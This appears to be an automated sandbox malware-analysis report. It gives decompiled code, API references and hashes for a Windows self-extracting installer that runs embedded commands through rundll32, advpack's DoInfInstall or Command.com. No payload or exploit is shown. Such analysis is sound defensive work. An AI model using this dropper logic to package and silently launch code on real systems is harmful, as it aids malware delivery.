                                                                                                                                                                                                                                            										_v304 = 1;
                                                                                                                                                                                                                                            										_v300 = _t137;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L14;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_push(6);
                                                                                                                                                                                                                                            								_v304 = 1;
                                                                                                                                                                                                                                            								_pop(0);
                                                                                                                                                                                                                                            								goto L11;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_v304 = 1;
                                                                                                                                                                                                                                            								L11:
                                                                                                                                                                                                                                            								_v300 = 0;
                                                                                                                                                                                                                                            								L14:
                                                                                                                                                                                                                                            								if(_t127 != 0) {
                                                                                                                                                                                                                                            									L27:
                                                                                                                                                                                                                                            									_t155 = 1;
                                                                                                                                                                                                                                            									__eflags = _t127 - 1;
                                                                                                                                                                                                                                            									if(_t127 != 1) {
                                                                                                                                                                                                                                            										L31:
                                                                                                                                                                                                                                            										_t132 =  &_v280;
                                                                                                                                                                                                                                            										_t76 = E00321AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                                                            										__eflags = _t76;
                                                                                                                                                                                                                                            										if(_t76 == 0) {
                                                                                                                                                                                                                                            											L62:
                                                                                                                                                                                                                                            											_t77 = 0;
                                                                                                                                                                                                                                            											L63:
                                                                                                                                                                                                                                            											_pop(_t150);
                                                                                                                                                                                                                                            											_pop(_t156);
                                                                                                                                                                                                                                            											_pop(_t128);
                                                                                                                                                                                                                                            											return E00326CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t157 = _v404;
                                                                                                                                                                                                                                            										__eflags = _t149;
                                                                                                                                                                                                                                            										if(_t149 != 0) {
                                                                                                                                                                                                                                            											L37:
                                                                                                                                                                                                                                            											__eflags = _t157;
                                                                                                                                                                                                                                            											if(_t157 == 0) {
                                                                                                                                                                                                                                            												L57:
                                                                                                                                                                                                                                            												_t151 = _v408;
                                                                                                                                                                                                                                            												_t146 =  &_v352;
                                                                                                                                                                                                                                            												_t130 = _t151; // executed
                                                                                                                                                                                                                                            												_t79 = E00323FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                                                            												__eflags = _t79;
                                                                                                                                                                                                                                            												if(_t79 == 0) {
                                                                                                                                                                                                                                            													L61:
                                                                                                                                                                                                                                            													LocalFree(_t151);
                                                                                                                                                                                                                                            													goto L62;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												L58:
                                                                                                                                                                                                                                            												LocalFree(_t151);
                                                                                                                                                                                                                                            												_t127 = _t127 + 1;
                                                                                                                                                                                                                                            												_v396 = _t127;
                                                                                                                                                                                                                                            												__eflags = _t127 - 2;
                                                                                                                                                                                                                                            												if(_t127 >= 2) {
                                                                                                                                                                                                                                            													_t155 = 1;
                                                                                                                                                                                                                                            													__eflags = 1;
                                                                                                                                                                                                                                            													L69:
                                                                                                                                                                                                                                            													__eflags =  *0x328580;
                                                                                                                                                                                                                                            													if( *0x328580 != 0) {
                                                                                                                                                                                                                                            														E00322267();
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            													_t77 = _t155;
                                                                                                                                                                                                                                            													goto L63;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												_t153 = _v392;
                                                                                                                                                                                                                                            												_t149 = _v388;
                                                                                                                                                                                                                                            												continue;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											L38:
                                                                                                                                                                                                                                            											__eflags =  *0x328180;
                                                                                                                                                                                                                                            											if( *0x328180 == 0) {
                                                                                                                                                                                                                                            												_t146 = 0x4c7;
                                                                                                                                                                                                                                            												E003244B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            												LocalFree(_v424);
                                                                                                                                                                                                                                            												 *0x329124 = 0x8007042b;
                                                                                                                                                                                                                                            												goto L62;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t157;
                                                                                                                                                                                                                                            											if(_t157 == 0) {
                                                                                                                                                                                                                                            												goto L57;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags =  *0x329a34 & 0x00000004;
                                                                                                                                                                                                                                            											if(__eflags == 0) {
                                                                                                                                                                                                                                            												goto L57;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t129 = E00326495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                                                            											__eflags = _t129;
                                                                                                                                                                                                                                            											if(_t129 == 0) {
                                                                                                                                                                                                                                            												_t146 = 0x4c8;
                                                                                                                                                                                                                                            												E003244B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0x329124 = E00326285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E003244B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0x328a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0x329a40; // 0x3
											_v364 = _t96;
											_t97 =  *0x328a38 & 0x0000ffff;
											_v380 = 0x329154;
											_v376 = _t151;
											_v372 = 0x3291e4;
											_v360 = _t97;
											if( *0x328a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0x329a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0x328d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0x329a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0x32a288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0x329124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0x329a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0x328a20;
										if( *0x328a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E0032202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E0032468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0x328c42;
									if( *0x328c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0x328a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E0032468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E0032468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t140 = "ADMQCMD";
                                                                                                                                                                                                                                            								goto L20;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L26:
                                                                                                                                                                                                                                            						_push(_t130);
                                                                                                                                                                                                                                            						_t146 = 0x104;
                                                                                                                                                                                                                                            						E00321781( &_v276, 0x104, _t130, 0x328c42);
                                                                                                                                                                                                                                            						goto L27;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t130 = "REBOOT";
                                                                                                                                                                                                                                            				_t125 = E0032468F(_t130, 0x329a2c, 4);
                                                                                                                                                                                                                                            				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                                                            					goto L25;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					goto L3;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                                            0x00323fad
                                                                                                                                                                                                                                            0x00323fb9
                                                                                                                                                                                                                                            0x00323fc2
                                                                                                                                                                                                                                            0x00323fc8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323fc8
                                                                                                                                                                                                                                            0x00323dfb
                                                                                                                                                                                                                                            0x00323dfd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323e03
                                                                                                                                                                                                                                            0x00323e0a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323e15
                                                                                                                                                                                                                                            0x00323e17
                                                                                                                                                                                                                                            0x00323e19
                                                                                                                                                                                                                                            0x00323f94
                                                                                                                                                                                                                                            0x00323fa4
                                                                                                                                                                                                                                            0x00323f7c
                                                                                                                                                                                                                                            0x00323f80
                                                                                                                                                                                                                                            0x00323f8b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323f8b
                                                                                                                                                                                                                                            0x00323e2c
                                                                                                                                                                                                                                            0x00323e30
                                                                                                                                                                                                                                            0x00323e34
                                                                                                                                                                                                                                            0x00323e36
                                                                                                                                                                                                                                            0x00323f69
                                                                                                                                                                                                                                            0x00323f6e
                                                                                                                                                                                                                                            0x00323f70
                                                                                                                                                                                                                                            0x00323f76
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323f76
                                                                                                                                                                                                                                            0x00323e3c
                                                                                                                                                                                                                                            0x00323e43
                                                                                                                                                                                                                                            0x00323e47
                                                                                                                                                                                                                                            0x00323e52
                                                                                                                                                                                                                                            0x00323e56
                                                                                                                                                                                                                                            0x00323e5c
                                                                                                                                                                                                                                            0x00323e61
                                                                                                                                                                                                                                            0x00323e68
                                                                                                                                                                                                                                            0x00323e70
                                                                                                                                                                                                                                            0x00323e74
                                                                                                                                                                                                                                            0x00323e7c
                                                                                                                                                                                                                                            0x00323e80
                                                                                                                                                                                                                                            0x00323e82
                                                                                                                                                                                                                                            0x00323e82
                                                                                                                                                                                                                                            0x00323e87
                                                                                                                                                                                                                                            0x00323e87
                                                                                                                                                                                                                                            0x00323e8b
                                                                                                                                                                                                                                            0x00323e91
                                                                                                                                                                                                                                            0x00323e94
                                                                                                                                                                                                                                            0x00323e96
                                                                                                                                                                                                                                            0x00323e96
                                                                                                                                                                                                                                            0x00323e9b
                                                                                                                                                                                                                                            0x00323e9b
                                                                                                                                                                                                                                            0x00323e9f
                                                                                                                                                                                                                                            0x00323ea2
                                                                                                                                                                                                                                            0x00323ea4
                                                                                                                                                                                                                                            0x00323ea4
                                                                                                                                                                                                                                            0x00323ea9
                                                                                                                                                                                                                                            0x00323ea9
                                                                                                                                                                                                                                            0x00323ead
                                                                                                                                                                                                                                            0x00323eb3
                                                                                                                                                                                                                                            0x00323eb6
                                                                                                                                                                                                                                            0x00323eb8
                                                                                                                                                                                                                                            0x00323eb8
                                                                                                                                                                                                                                            0x00323ebd
                                                                                                                                                                                                                                            0x00323ebd
                                                                                                                                                                                                                                            0x00323ec1
                                                                                                                                                                                                                                            0x00323ec3
                                                                                                                                                                                                                                            0x00323ec5
                                                                                                                                                                                                                                            0x00323ec5
                                                                                                                                                                                                                                            0x00323eca
                                                                                                                                                                                                                                            0x00323eca
                                                                                                                                                                                                                                            0x00323ece
                                                                                                                                                                                                                                            0x00323ed5
                                                                                                                                                                                                                                            0x00323ed9
                                                                                                                                                                                                                                            0x00323ee0
                                                                                                                                                                                                                                            0x00323ee6
                                                                                                                                                                                                                                            0x00323eea
                                                                                                                                                                                                                                            0x00323eec
                                                                                                                                                                                                                                            0x00323eee
                                                                                                                                                                                                                                            0x00323ef3
                                                                                                                                                                                                                                            0x00323ef3
                                                                                                                                                                                                                                            0x00323ef5
                                                                                                                                                                                                                                            0x00323efa
                                                                                                                                                                                                                                            0x00323efb
                                                                                                                                                                                                                                            0x00323efd
                                                                                                                                                                                                                                            0x00323f40
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323eff
                                                                                                                                                                                                                                            0x00323eff
                                                                                                                                                                                                                                            0x00323f05
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323f05
                                                                                                                                                                                                                                            0x00323efd
                                                                                                                                                                                                                                            0x00323dc7
                                                                                                                                                                                                                                            0x00323dce
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323dd0
                                                                                                                                                                                                                                            0x00323dd7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323dd9
                                                                                                                                                                                                                                            0x00323ddb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323ddd
                                                                                                                                                                                                                                            0x00323de1

APIs
• memset.MSVCRT ref: 00323C11
• CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00323CDC
  • Part of subcall function 0032468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003246A0
  • Part of subcall function 0032468F: SizeofResource.KERNEL32(00000000,00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246A9
  • Part of subcall function 0032468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003246C3
  • Part of subcall function 0032468F: LoadResource.KERNEL32(00000000,00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246CC
  • Part of subcall function 0032468F: LockResource.KERNEL32(00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246D3
  • Part of subcall function 0032468F: memcpy_s.MSVCRT ref: 003246E5
  • Part of subcall function 0032468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003246EF
• CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00328C42), ref: 00323D8F
• GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00323E26
• FreeLibrary.KERNEL32(00000000,?,00328C42), ref: 00323EFF
• LocalFree.KERNEL32(?,?,?,?,00328C42), ref: 00323F1F
• FreeLibrary.KERNEL32(00000000,?,00328C42), ref: 00323F40
• LocalFree.KERNEL32(?,?,?,?,00328C42), ref: 00323F47
• FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00328C42), ref: 00323F76
• LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00328C42), ref: 00323F80
• LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00328C42), ref: 00323FC2
Strings
Memory Dump Source
• Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
Similarity
• API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
• String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$cent
• API String ID: 1032054927-1634589459
• Opcode ID: a62da986a5eeb560798d94add9b0a2df2323b2cfccd2cd921a29c9022ae3a8c2
• Instruction ID: a8e872a3f359b0cc478637afdecea5562e9ba8a34707d9cc6113969f11d9b7e2
• Opcode Fuzzy Hash: a62da986a5eeb560798d94add9b0a2df2323b2cfccd2cd921a29c9022ae3a8c2
• Instruction Fuzzy Hash: 3BB1D270908331AFD733DF24B945B6B76E8EB84700F11492EFA85D6191DB78CA45CB92
Uniqueness

Uniqueness Score: -1.00%
Control-flow Graph

[Control-flow graph for the function starting at 321ae8; legend: Executed / Not Executed. Graph not preserved.]
                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E00321AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                                                            				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0x328004; // 0x2c4b51c8
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E00321680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E00321A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E00321781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
					E0032658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00321680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E003266C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E003266C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00321680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00321781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E003216B3( &_v1552, 0x400, " ");
										E003216B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00322AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E0032171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t85 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                                                                                                                                                                                            								_t140 = 0x525;
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0x10);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_t60 =  &_v268;
                                                                                                                                                                                                                                            								goto L35;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t140 = "[";
                                                                                                                                                                                                                                            								_v1556 = _t151;
                                                                                                                                                                                                                                            								_t90 = E00321A84( &_v1556, "[");
                                                                                                                                                                                                                                            								if(_t90 != 0) {
                                                                                                                                                                                                                                            									if( *_t90 != 0) {
                                                                                                                                                                                                                                            										_v1556 = _t90;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t140 = "]";
                                                                                                                                                                                                                                            									E00321A84( &_v1556, "]");
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                                                            								if(_t156 == 0) {
                                                                                                                                                                                                                                            									L43:
                                                                                                                                                                                                                                            									_t60 = 0;
                                                                                                                                                                                                                                            									_t140 = 0x4b5;
                                                                                                                                                                                                                                            									_push(0);
                                                                                                                                                                                                                                            									_push(0x10);
                                                                                                                                                                                                                                            									_push(0);
                                                                                                                                                                                                                                            									L35:
                                                                                                                                                                                                                                            									_push(_t60);
                                                                                                                                                                                                                                            									E003244B9(0, _t140);
                                                                                                                                                                                                                                            									_t62 = 0;
                                                                                                                                                                                                                                            									goto L54;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t155 = _v1556;
                                                                                                                                                                                                                                            									_t92 = _t155;
                                                                                                                                                                                                                                            									if( *_t155 == 0) {
                                                                                                                                                                                                                                            										_t92 = "DefaultInstall";
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									 *0x329120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                                                            									 *_v1560 = 1;
                                                                                                                                                                                                                                            									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x321140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                                                            										 *0x329a34 =  *0x329a34 & 0xfffffffb;
                                                                                                                                                                                                                                            										if( *0x329a40 != 0) {
                                                                                                                                                                                                                                            											_t108 = "setupapi.dll";
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t108 = "setupx.dll";
                                                                                                                                                                                                                                            											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										if( *_t155 == 0) {
                                                                                                                                                                                                                                            											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_push( &_v268);
                                                                                                                                                                                                                                            										_push(_t155);
                                                                                                                                                                                                                                            										E0032171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										 *0x329a34 =  *0x329a34 | 0x00000004;
                                                                                                                                                                                                                                            										if( *_t155 == 0) {
                                                                                                                                                                                                                                            											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										E00321680(_t108, 0x104, _t155);
                                                                                                                                                                                                                                            										_t140 = 0x200;
                                                                                                                                                                                                                                            										E00321680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									L53:
                                                                                                                                                                                                                                            									_t62 = 1;
                                                                                                                                                                                                                                            									 *_v1564 = _t156;
                                                                                                                                                                                                                                            									L54:
                                                                                                                                                                                                                                            									_pop(_t152);
                                                                                                                                                                                                                                            									return E00326CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}














































                                                                                                                                                                                                                                            0x00321bd3
                                                                                                                                                                                                                                            0x00321d75
                                                                                                                                                                                                                                            0x00321d76
                                                                                                                                                                                                                                            0x00321d78
                                                                                                                                                                                                                                            0x00321d7f
                                                                                                                                                                                                                                            0x00321e05
                                                                                                                                                                                                                                            0x00321e09
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00321e12
                                                                                                                                                                                                                                            0x00321e1b
                                                                                                                                                                                                                                            0x00321e73
                                                                                                                                                                                                                                            0x00321e21
                                                                                                                                                                                                                                            0x00321e21
                                                                                                                                                                                                                                            0x00321e28
                                                                                                                                                                                                                                            0x00321e37
                                                                                                                                                                                                                                            0x00321e3e
                                                                                                                                                                                                                                            0x00321e52
                                                                                                                                                                                                                                            0x00321e60
                                                                                                                                                                                                                                            0x00321e60
                                                                                                                                                                                                                                            0x00321e3e
                                                                                                                                                                                                                                            0x00321e79
                                                                                                                                                                                                                                            0x00321e7b
                                                                                                                                                                                                                                            0x00321e84
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00321d9b
                                                                                                                                                                                                                                            0x00321d9b
                                                                                                                                                                                                                                            0x00321da0
                                                                                                                                                                                                                                            0x00321da2
                                                                                                                                                                                                                                            0x00321da5
                                                                                                                                                                                                                                            0x00321da5
                                                                                                                                                                                                                                            0x00321da7
                                                                                                                                                                                                                                            0x00321da8
                                                                                                                                                                                                                                            0x00321dac
                                                                                                                                                                                                                                            0x00321dae
                                                                                                                                                                                                                                            0x00321db4
                                                                                                                                                                                                                                            0x00321db7
                                                                                                                                                                                                                                            0x00321db7
                                                                                                                                                                                                                                            0x00321db9
                                                                                                                                                                                                                                            0x00321dba
                                                                                                                                                                                                                                            0x00321dbe
                                                                                                                                                                                                                                            0x00321dc3
                                                                                                                                                                                                                                            0x00321dce
                                                                                                                                                                                                                                            0x00321dd2
                                                                                                                                                                                                                                            0x00321deb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00321df0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00321dd2
                                                                                                                                                                                                                                            0x00321bf7
                                                                                                                                                                                                                                            0x00321bfe
                                                                                                                                                                                                                                            0x00321c07
                                                                                                                                                                                                                                            0x00321d55
                                                                                                                                                                                                                                            0x00321d5a
                                                                                                                                                                                                                                            0x00321d5b
                                                                                                                                                                                                                                            0x00321d5d
                                                                                                                                                                                                                                            0x00321d5e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00321c1b
                                                                                                                                                                                                                                            0x00321c1b
                                                                                                                                                                                                                                            0x00321c20
                                                                                                                                                                                                                                            0x00321c2c
                                                                                                                                                                                                                                            0x00321c33
                                                                                                                                                                                                                                            0x00321c38
                                                                                                                                                                                                                                            0x00321c3a
                                                                                                                                                                                                                                            0x00321c3a
                                                                                                                                                                                                                                            0x00321c40
                                                                                                                                                                                                                                            0x00321c4b
                                                                                                                                                                                                                                            0x00321c4b
                                                                                                                                                                                                                                            0x00321c5d
                                                                                                                                                                                                                                            0x00321c61
                                                                                                                                                                                                                                            0x00321dd4
                                                                                                                                                                                                                                            0x00321dd4
                                                                                                                                                                                                                                            0x00321dd6
                                                                                                                                                                                                                                            0x00321ddb
                                                                                                                                                                                                                                            0x00321ddc
                                                                                                                                                                                                                                            0x00321dde
                                                                                                                                                                                                                                            0x00321d64
                                                                                                                                                                                                                                            0x00321d64
                                                                                                                                                                                                                                            0x00321d67
                                                                                                                                                                                                                                            0x00321d6c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00321c67
                                                                                                                                                                                                                                            0x00321c67
                                                                                                                                                                                                                                            0x00321c6d
                                                                                                                                                                                                                                            0x00321c72
                                                                                                                                                                                                                                            0x00321c74
                                                                                                                                                                                                                                            0x00321c74
                                                                                                                                                                                                                                            0x00321c8e
                                                                                                                                                                                                                                            0x00321c99
                                                                                                                                                                                                                                            0x00321cc0
                                                                                                                                                                                                                                            0x00321cf8
                                                                                                                                                                                                                                            0x00321d07
